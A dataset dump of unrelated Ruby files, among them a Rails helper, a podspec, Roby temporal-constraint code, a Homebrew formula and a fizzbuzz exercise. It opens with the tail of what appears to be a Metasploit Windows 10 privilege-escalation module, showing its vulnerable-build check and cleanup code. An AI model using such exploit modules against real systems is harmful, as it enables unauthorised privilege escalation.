print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog('Could not connect to session', error: e)
raise Msf::Exploit::Failed, 'Could not connect to session'
end
def validate_target
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
end
# Vulnerable window: Windows 10 builds (17763, 19041].
# NOTE: match(...)[0] is deliberately the *whole* matched string (the build
# number token), not capture group 1.
def check
sysinfo_value = sysinfo['OS']
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Build Number = #{build_num}")
if sysinfo_value =~ /10/ && (17763 < build_num) && (build_num <= 19041)
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
# Best-effort delete of a remote file; deletion failure is reported but
# not fatal.
def ensure_clean_destination(path)
return unless file?(path)
print_status("#{path} already exists on the target. Deleting...")
begin
file_rm(path)
print_status("Deleted #{path}")
rescue Rex::Post::Meterpreter::RequestError => e
elog(e)
print_error("Unable to delete #{path}")
end
end
end
| 40.266667 | 156 | 0.660747 |
# View helpers for the Lamby documentation site: theming CSS classes,
# doc-page titles/links and Disqus embedding.
module ApplicationHelper
def theme_class
'lb-Theme--blue'
end
def main_class
"lb-Main--#{controller_name}"
end
# Render a link to the doc page +slug+. Recognized options:
#   :link_suffix -- appended to the link text (consumed, not forwarded)
#   :class       -- forwarded to the <a> tag; everything else becomes
#                   URL parameters.
def doc_link(slug, options = {})
name = doc_name(slug)
# NOTE: << mutates the string returned by doc_name; safe only while
# doc_name keeps returning fresh (unfrozen) strings.
name << options.delete(:link_suffix).to_s
dopts = options.except(:class)
lopts = options.slice(:class)
link_to name, doc_lpath(slug, dopts), lopts
end
# Human-readable title for a doc slug; unknown slugs are titleized.
def doc_name(slug)
case slug
when :anatomy then "Lamby's Anatomy"
when :installing_aws_sam then 'Installing AWS SAM'
when :asset_host_and_precompiling then 'Precompiling CSS & JavaScript Assets'
when :environment_and_configuration then 'Environment & Configuration'
when :bin_scripts_build_and_deploy then 'Build & Deploy'
when :custom_domain_names then 'Custom Domain Names, CloudFront, & SSL'
when :api_gateway_and_cloudwatch_logs then 'API Gateway & CloudWatch Logs'
when :activejob_and_lambda then 'ActiveJob & Lambda'
when :logging_metrics_observability then 'Logging, Metrics, & Observability'
when :database_options then 'Database & VPCs'
when :cold_starts then 'Cold Starts'
when :running_tasks then 'Running Tasks'
else slug.to_s.titleize
end
end
def doc_lpath(slug, options = {})
doc_path options.merge(id: slug)
end
# "Next page" navigation button at the bottom of a doc page.
def doc_next(slug)
content_tag :div, class: 'lb-Page-nav' do
doc_link slug, link_suffix: ' →', class: 'lb-Button lb-Button-fullResponsive mui-btn mui-btn--large mui-btn--danger mui-btn--raised'
end
end
def disqus
render partial: 'disqus' if disqus?
end
# Comments are only embedded in production.
def disqus?
Rails.env.production?
end
end
| 28.464286 | 138 | 0.710163 |
require "json"

# CocoaPods spec for the iOS side of this React Native module; version and
# descriptive metadata are sourced from the sibling package.json so the pod
# stays in lock-step with the npm package.
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "dianvo-native-android-xupdate"
s.version = package["version"]
s.summary = package["description"]
s.homepage = package["homepage"]
s.license = package["license"]
s.authors = package["author"]
s.platforms = { :ios => "10.0" }
s.source = { :git => "https://github.com/DeepRolling/react-native-android-xupdate.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,mm,swift}"
s.dependency "React-Core"
end
| 26.909091 | 120 | 0.60473 |
require File.expand_path('../boot', __FILE__)
require 'rails/all'
Bundler.require(*Rails.groups)
# Load the gem under test so the dummy app can exercise it.
require "payola_spy"
# Minimal Rails application used as a test harness for the payola_spy gem.
module Dummy
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
end
end
| 36.833333 | 99 | 0.719457 |
ab03225a2dd241480cad933196e506f2a654fd62 | 283 | # Don't forget! This file needs to be 'required' in its spec file
# See README.md for instructions on how to do this
# Classic FizzBuzz: returns "FizzBuzz" for multiples of both 3 and 5,
# "Buzz" for multiples of 5 only, "Fizz" for multiples of 3 only, and the
# number itself otherwise.
#
# Fix: the original `else` branch evaluated `int` and then fell through to
# `puts "FizzBuzz"`, so non-multiples printed spurious output and the
# method returned nil instead of the number.
def fizzbuzz(int)
  if int % 3 == 0 && int % 5 == 0
    "FizzBuzz"
  elsif int % 5 == 0
    "Buzz"
  elsif int % 3 == 0
    "Fizz"
  else
    int
  end
end
21d2d02fdf7bfd81da18880f9fa7f1e64400099a | 20,958 | # Define Infinity
# Define the top-level Infinity constant unless something else already did.
# Float::INFINITY is the stdlib spelling of the exact IEEE-754 value that
# the previous 1.0/0 expression produced.
Infinity = Float::INFINITY unless defined?(Infinity)
module Roby
# Reopens Roby::Plan to attach deadline bookkeeping used by the
# TemporalConstraints relation below.
class Plan
# An EventStructure::EventDeadlines instance that is used by the
# TemporalConstraints relation to maintain the set of event deadlines
attribute(:emission_deadlines) { EventStructure::EventDeadlines.new }
end
module EventStructure
# Bookkeeping for emission deadlines: an ordered collection of
# [deadline_time, triggering_event, generator] triples, kept sorted by
# deadline so expired entries can be popped from the front.
class EventDeadlines
# The sorted array of [time, event, generator] triples
attr_reader :deadlines

def initialize
  @deadlines = []
end

# Queue a new deadline entry, keeping the collection ordered by time
def add(deadline, event, generator)
  @deadlines << [deadline, event, generator]
  @deadlines = @deadlines.sort_by { |entry| entry[0] }
end

# Remove the first deadline registered for +generator+ that is still in
# the future with respect to +time+. Returns true if such an entry
# existed, false otherwise.
def remove_deadline_for(generator, time)
  index = @deadlines.find_index do |deadline, _, gen|
    deadline > time && generator == gen
  end
  return false unless index

  @deadlines.delete_at(index)
  true
end

# Number of deadlines currently queued
def size
  @deadlines.size
end

# Pop and return every entry whose deadline lies strictly before
# +current_time+
def missed_deadlines(current_time)
  missed = []
  missed << @deadlines.shift while !@deadlines.empty? && @deadlines.first[0] < current_time
  missed
end
end
# Exception class used when an event has missed its deadline
#
# Raised by TemporalConstraints.check_structure when a generator failed to
# emit before the deadline derived from +constraining_event+'s emission.
class MissedDeadlineError < LocalizedError
# The event from which we deduced the deadline
attr_reader :constraining_event
# The time before which the failed generator should have emitted
attr_reader :deadline
# +generator+ is the generator that missed its deadline (stored by
# LocalizedError as failed_generator).
def initialize(generator, constraining_event, deadline)
super(generator)
@constraining_event = constraining_event
@deadline = deadline
end
def pretty_print(pp)
pp.text "#{failed_generator} missed the deadline of #{deadline}"
pp.breakable
pp.text " required after the emission of #{constraining_event}"
end
end
# Exception raised when an event gets emitted outside its specified
# temporal constraints
class TemporalConstraintViolation < LocalizedError
# The generator whose constraint was violated
attr_reader :parent_generator
# Copy of the allowed [min, max] intervals at the time of the violation
attr_reader :allowed_intervals
def initialize(event, parent_generator, allowed_intervals)
super(event)
@parent_generator = parent_generator
# dup so later mutation of the live constraint set does not change the
# recorded evidence
@allowed_intervals = allowed_intervals.dup
end
def pretty_print(pp)
pp.text "Got "
failed_event.pretty_print(pp)
pp.text "It breaks the temporal constraint(s) #{allowed_intervals.map { |min, max| "[#{min}, #{max}]" }.join(" | ")} from"
pp.nest(2) do
pp.breakable
parent_generator.pretty_print(pp)
end
end
end
# Exception raised when an event gets emitted outside its specified
# temporal constraints
#
# Specifically: the number of emissions of +parent_generator+ (+count+,
# possibly counted only since +since+) falls outside +allowed_interval+.
class OccurenceConstraintViolation < LocalizedError
attr_reader :parent_generator
# Observed number of emissions of parent_generator
attr_reader :count
# Required [min, max] emission count
attr_reader :allowed_interval
# Start of the counting window, or nil when counting over all history
attr_reader :since
def initialize(event, parent_generator, count, allowed_interval, since)
super(event)
@parent_generator = parent_generator
@count = count
@allowed_interval = allowed_interval
@since = since
end
def pretty_print(pp)
pp.text "Got "
failed_event.pretty_print(pp)
pp.breakable
pp.text "This does not satisfy the occurance constraint [#{allowed_interval[0]}, #{allowed_interval[1]}] from"
pp.nest(2) do
pp.breakable
parent_generator.pretty_print(pp)
end
pp.breakable
pp.text "which has been emitted #{count} times"
if since
pp.text " since #{since}"
end
end
end
# A representation of a set of disjoint intervals, sorted in increasing
# order
class DisjointIntervalSet
# A list of intervals as [min, max]. The list is sorted in increasing order
attr_reader :intervals
def initialize
@intervals = Array.new
end
# Returns true if +value+ is included in one of the intervals
def include?(value)
# intervals are sorted, so the first interval whose max reaches +value+
# is the only candidate that could contain it
candidate = intervals.
find { |min, max| max >= value }
candidate && (candidate[0] <= value)
end
# Returns the lower and upper bound of the union of all intervals
def boundaries
[intervals.first[0], intervals.last[1]]
end
# Adds a new interval to the set, merging it with existing intervals
# if needed
#
# Returns +self+
# NOTE(review): on the empty-set fast path below, the bare +return+
# actually returns nil, not self -- callers must not rely on chaining.
def add(min, max)
if intervals.empty?
intervals << [min, max]
return
end
# Phase 1: copy intervals strictly below [min, max], then splice the new
# interval in, merging with the first overlapping interval if any.
new_list = Array.new
while interval = intervals.shift
if interval[1] < min
new_list << interval
elsif interval[0] > min
if interval[0] > max
new_list << [min, max] << interval
break
else
new_list << [min, [max, interval[1]].max]
end
break
else
new_list << [interval[0], [max, interval[1]].max]
break
end
end
# Phase 2: absorb any further intervals that the (possibly extended)
# last entry of new_list now overlaps.
if intervals.empty? && new_list.last[1] < min
new_list << [min, max]
elsif new_list.last[1] <= max
while interval = intervals.shift
last_interval = new_list.last
# It is guaranteed that interval[0] > last_interval[0].
# We therefore only need to check if interval[0] is
# included in last_interval
if interval[0] <= last_interval[1]
if last_interval[1] < interval[1]
last_interval[1] = interval[1]
break
end
else
new_list << interval
break
end
end
end
# We now know that the last interval in new_list has an upper
# bound that comes from an already existing interval. We are
# therefore sure that there are no overlaps.
new_list.concat(intervals)
@intervals = new_list
self
end
end
# A DisjointIntervalSet augmented with occurence-count constraints. Two
# independent [min, max] count windows are tracked: one applied over the
# generator's whole history (key false) and one applied recurrently since
# the last emission (key true).
class TemporalConstraintSet < DisjointIntervalSet
# Hash of { recurrent_flag => [min_count, max_count] }
attr_reader :occurence_constraints

def initialize
  super
  @occurence_constraints = {
    true => [0, Infinity],
    false => [0, Infinity]
  }
end

# Tighten the count window for the given mode: the stored minimum may
# only grow and the stored maximum may only shrink.
def add_occurence_constraint(min, max, recurrent)
  bounds = @occurence_constraints[!!recurrent]
  bounds[0] = min if bounds[0] < min
  bounds[1] = max if bounds[1] > max
end
end
# This relation maintains a network of temporal constraints between
# events, that apply on the scheduling of these events
#
# If the a -> b edge exists in this graph, it specifies that
# \c b can be scheduled if and only if \c a can be scheduled *regardless
# of the existing temporal constraints that are due to \c b.
#
# As an example, let's set up a graph in which
# * a task ta will be started after a task tb has started *but*
# * all temporal constraints that apply on ta also apply on tb.
#
# The required edges are
#
# tb.success -> ta.start t=[0, Infinity], o=[1, Infinity] in TemporalConstraints
# ta.start -> tb.start in SchedulingConstraints
#
# The relation code takes care of maintaining the symmetric relationship
relation :SchedulingConstraints,
:child_name => :forward_scheduling_constraint,
:parent_name => :backward_scheduling_constraint,
:dag => false,
:noinfo => true do
# Declares that +self+ must be scheduled whenever +event+ is: the
# scheduling constraints of self become tied to event's.
def schedule_as(event)
event.add_forward_scheduling_constraint(self)
end
# True if this event is constrained by the TemporalConstraints
# relation in any way
def has_scheduling_constraints?
return true if has_temporal_constraints?
# any backward scheduling-constraint parent counts as a constraint
each_backward_scheduling_constraint do |parent|
return true
end
false
end
end
# Module that implements shortcuts on tasks to use the scheduling
# constraints
module TaskSchedulingConstraints
# Adds a constraint that ensures that the start event of +self+ is
# scheduled as the start event of +task+
def schedule_as(task)
start_event.schedule_as(task.start_event)
end
end
# Make the shortcut available on every Roby task
Roby::Task.include TaskSchedulingConstraints
# This relation maintains a network of temporal constraints between
# events.
#
# A relation A => B [min, max] specifies that, once the event A is
# emitted, the event B should be emitted within a [min, max] amount of
# time. Obviously, it is guaranteed that min > 0 and max > min
#
# The relation code takes care of maintaining the symmetric relationship
relation :TemporalConstraints,
:child_name => :forward_temporal_constraint,
:parent_name => :backward_temporal_constraint,
:dag => false do
# Shortcut to specify that +self+ should be emitted after
# +other_event+
#
# Options: :min_t/:max_t bound the delay after other_event's emission,
# :recurrent selects the recurrent occurence-counting mode. When no
# options are given, +recurrent+ stays nil (treated as false).
def should_emit_after(other_event, options = nil)
if options
options = Kernel.validate_options options,
:min_t => nil, :max_t => nil, :recurrent => false
recurrent = options[:recurrent]
end
other_event.add_occurence_constraint(self, 1, Infinity, recurrent)
if options && (options[:min_t] || options[:max_t])
other_event.add_temporal_constraint(self,
options[:min_t] || 0, options[:max_t] || Infinity)
end
end
# True if this event is constrained by the TemporalConstraints
# relation in any way
def has_temporal_constraints?
each_backward_temporal_constraint do |parent|
return true
end
false
end
# Returns a [parent, intervals] pair that represents a temporal
# constraint the given time fails to meet
#
# An optional block acts as a filter: only parents for which the block
# returns truthy are checked. Returns nil when all constraints are met.
def find_failed_temporal_constraint(time)
each_backward_temporal_constraint do |parent|
if block_given?
next if !yield(parent)
end
disjoint_set = parent[self, TemporalConstraints]
next if disjoint_set.intervals.empty?
if disjoint_set.boundaries[0] < 0
# It might be fullfilled in the future
next
end
max_diff = disjoint_set.boundaries[1]
parent.history.each do |parent_event|
diff = time - parent_event.time
if diff > max_diff || !disjoint_set.include?(diff)
return parent, disjoint_set
end
disjoint_set.include?(diff)
end
end
nil
end
# Returns true if this event meets its temporal constraints
def meets_temporal_constraints?(time, &block)
!find_failed_temporal_constraint(time, &block) &&
!find_failed_occurence_constraint(true, &block)
end
# Creates a temporal constraint between +self+ and +other_event+.
# +min+ is the minimum time
#
# Raises ArgumentError if min > max. Fully-negative windows are stored
# as a reversed constraint on other_event; a window straddling zero is
# stored in both directions.
def add_temporal_constraint(other_event, min, max)
if min > max
raise ArgumentError, "min should be lower than max (min == #{min} and max == #{max})"
end
if max < 0
return other_event.add_temporal_constraint(self, -max, -min)
elsif min < 0
set = TemporalConstraintSet.new
set.add(-max, -min)
other_event.add_forward_temporal_constraint(self, set)
end
set = TemporalConstraintSet.new
set.add(min, max)
add_forward_temporal_constraint(other_event, set)
set
end
# Adds a constraint on the allowed emission of +other_event+ based
# on the existing emissions of +self+
#
# +min+ and +max+ specify the minimum (resp. maximum) of times
# +self+ should be emitted before +other_event+ has the right to be
# emitted.
#
# If +recurrent+ is true, then the min/max values are computed using
# the emissions of +self+ since the last emission of +other_event+.
# Otherwise, all emissions since the creation of +self+ are taken
# into account.
def add_occurence_constraint(other_event, min, max = Infinity, recurrent = false)
set = TemporalConstraintSet.new
set.add_occurence_constraint(min, max, recurrent)
add_forward_temporal_constraint(other_event, set)
end
# Looks for an occurence constraint that is currently violated.
# +next_event+ selects the reference emission: the last one (when
# checking whether a new emission would be allowed) or the previous
# one (when validating an emission that just happened). Returns nil,
# or [parent, count, [min, max]] optionally followed by the window
# start time for recurrent constraints.
def find_failed_occurence_constraint(next_event)
base_event = if next_event then last
else history[-2]
end
if base_event
base_time = base_event.time
end
each_backward_temporal_constraint do |parent|
if block_given?
next if !yield(parent)
end
constraints = parent[self, TemporalConstraints]
counts = { false => parent.history.size }
if base_time
# emissions up to base_time do not count in recurrent mode
negative_count = parent.history.inject(0) do |count, ev|
break(count) if ev.time > base_time
count + 1
end
else
negative_count = 0
end
counts[true] = counts[false] - negative_count
counts.each do |recurrent, count|
min_count, max_count = constraints.occurence_constraints[recurrent]
if count < min_count || count > max_count
if recurrent && base_time
return [parent, parent.history.size, [min_count, max_count], base_time]
else
return [parent, parent.history.size, [min_count, max_count]]
end
end
end
end
nil
end
# Overloaded to register deadlines that this event's emissions
# define
def fired(event)
super if defined? super
# Verify that the event matches any running constraint
parent, intervals = find_failed_temporal_constraint(event.time)
if parent
plan.engine.add_error TemporalConstraintViolation.new(event, parent, intervals.intervals)
end
parent, count, allowed_interval, since = find_failed_occurence_constraint(false)
if parent
plan.engine.add_error OccurenceConstraintViolation.new(event, parent, count, allowed_interval, since)
end
deadlines = plan.emission_deadlines
# Remove the deadline that this emission fullfills (if any)
deadlines.remove_deadline_for(self, event.time)
# Add new deadlines
each_forward_temporal_constraint do |target, disjoint_set|
next if disjoint_set.intervals.empty?
max_diff = disjoint_set.boundaries[1]
is_fullfilled = target.history.any? do |target_event|
diff = event.time - target_event.time
break if diff > max_diff
disjoint_set.include?(diff)
end
if !is_fullfilled
deadlines.add(event.time + disjoint_set.boundaries[1], event, target)
end
end
end
end
# Module defining shortcuts on tasks to use the temporal constraints
module TaskTemporalConstraints
# Ensures that this task is started after +task_or_event+ has
# finished (if it is a task) or +task_or_event+ is emitted (if it is
# an event)
#
# Raises ArgumentError for any other argument type.
def should_start_after(task_or_event)
case task_or_event
when Roby::Task
start_event.should_emit_after(task_or_event.stop_event)
when Roby::EventGenerator
start_event.should_emit_after(task_or_event)
else
raise ArgumentError, "expected a task or an event generator, got #{task_or_event} of class #{task_or_event.class}"
end
end
end
# Make the shortcut available on every Roby task
Roby::Task.include TaskTemporalConstraints
# Returns the DisjointIntervalSet that represent the merge of the
# deadlines represented by +opt1+ and +opt2+
#
# Used by the relation graph when the same edge gets constraint info from
# two sources. Interval sets are unioned (seeding from the larger set for
# efficiency) and occurence windows are intersected.
def TemporalConstraints.merge_info(parent, child, opt1, opt2)
result = TemporalConstraintSet.new
if opt1.intervals.size > opt2.intervals.size
result.intervals.concat(opt1.intervals)
for i in opt2.intervals
result.add(*i)
end
else
result.intervals.concat(opt2.intervals)
for i in opt1.intervals
result.add(*i)
end
end
# Occurence windows: take opt1's as-is, then tighten with opt2's
result.occurence_constraints.merge!(opt1.occurence_constraints)
opt2.occurence_constraints.each do |recurrent, spec|
result.add_occurence_constraint(spec[0], spec[1], recurrent)
end
result
end
# Check the temporal constraint structure
#
# What it needs to do is check that events that *should* have been
# emitted had been. The emission of events outside of allowed intervals
# is already taken care of.
#
# Optimize by keeping the list of maximum bounds at which an event
# should be emitted.
#
# Returns an array of MissedDeadlineError, one per expired deadline.
def TemporalConstraints.check_structure(plan)
deadlines = plan.emission_deadlines
# Now look for the timeouts
errors = []
deadlines.missed_deadlines(Time.now).
each do |deadline, event, generator|
errors << MissedDeadlineError.new(generator, event, deadline)
end
errors
end
end
end
| 39.394737 | 138 | 0.52047 |
# Gem namespace for comment_attribute; VERSION is read by the gemspec.
module CommentAttribute
# Current released version of the gem
VERSION = '0.1.3'
end
| 12 | 23 | 0.729167 |
ab92ae9310026d3a434f5aaa251a170258442674 | 65 | module Nurego
class APIConnectionError < NuregoError
end
end
| 13 | 40 | 0.8 |
# Creates the table recording partial/full capture events against a Spree
# payment, indexed by payment for fast per-payment lookups.
class CreateSpreePaymentCaptureEvents < ActiveRecord::Migration[4.2]
def change
create_table :spree_payment_capture_events do |t|
# Amount captured in this event (currency decimal, defaults to zero)
t.decimal :amount, precision: 10, scale: 2, default: 0.0
t.integer :payment_id
t.timestamps null: false, precision: 6
end
add_index :spree_payment_capture_events, :payment_id
end
end
| 26.846154 | 68 | 0.730659 |
require 'rails_helper'
# System (browser-driven) spec: a signed-in user can create an expense and
# attach it to one of their groups.
RSpec.describe 'Expense creation', type: :system do
before :each do
# Reset users and seed one user with two groups to choose from
User.delete_all
user1 = User.new(name: 'u_test', email: '[email protected]', password: 'konohavillage')
user1.save
user1.groups.create(name: 'expense test')
user1.groups.create(name: 'expense test 2')
end
it 'Can create expense' do
visit '/users/sign_in'
within('#new_user') do
fill_in 'Email', with: '[email protected]'
fill_in 'Password', with: 'konohavillage'
end
# NOTE(review): the fixed sleeps below look like workarounds for async
# page loads; Capybara's waiting matchers would normally cover this --
# confirm before removing.
sleep(2)
click_button 'Log in'
sleep(3)
visit '/expenses/new'
sleep(5)
within '.form-inputs' do
fill_in 'expense_name', with: 'Test expense'
fill_in 'expense_amount', with: '100'
find(:css, '#expense_group_ids').find(:option, 'expense test').select_option
end
sleep(5)
click_button 'Create Expense'
expect(page).to have_content 'Expense was successfully created.'
sleep(5)
end
end
| 24.512821 | 89 | 0.656904 |
e9746f488a87b10a37c6e94ab64bc457e6cc5573 | 158 | class TaggingSerializer < ActiveModel::Serializer
attributes :id, :spark, :tag
def spark
object.spark.id
end
def tag
object.tag.id
end
end
| 14.363636 | 49 | 0.696203 |
# Homebrew formula for points2grid (OSGeo bottle tap): builds the DEM
# gridding tool from the 1.3.1 release tarball with GDAL support.
class OsgeoPoints2grid < Formula
desc "Generate digital elevation models using local griding"
homepage "https://github.com/CRREL/points2grid"
url "https://github.com/CRREL/points2grid/archive/1.3.1.tar.gz"
sha256 "6e2f2d3bbfd6f0f5c2d0c7d263cbd5453745a6fbe3113a3a2a630a997f4a1807"
bottle do
root_url "https://bottle.download.osgeo.org"
cellar :any
sha256 "40896708527e509a19c3c5d7d72b450f072ffac16d065ba9629498aa68225646" => :mojave
sha256 "40896708527e509a19c3c5d7d72b450f072ffac16d065ba9629498aa68225646" => :high_sierra
sha256 "84c8ebcfb7828a9e71b6970c701a6ae0dffeeb80584f24562b0f753cbb9268eb" => :sierra
end
# revision 1
head "https://github.com/CRREL/points2grid.git", :branch => "master"
depends_on "cmake" => :build
depends_on "boost"
depends_on "curl"
depends_on "osgeo-gdal"
def install
ENV.cxx11
args = std_cmake_args + %W[-DWITH_GDAL=ON -DWITH_TESTS=ON -DCMAKE_PREFIX_PATH=#{Formula["curl"].opt_prefix}]
# Keep the sample LAS file around for the post-install test below
libexec.install "test/data/example.las"
system "cmake", ".", *args
system "make", "install"
end
test do
# Grid the bundled sample and check a known elevation value occurs the
# expected number of times in the output grid
system bin/"points2grid",
"-i", libexec/"example.las",
"-o", "example",
"--max", "--output_format", "grid"
assert_equal 13, File.read("example.max.grid").scan("423.820000").size
end
end
| 32.292683 | 112 | 0.716012 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.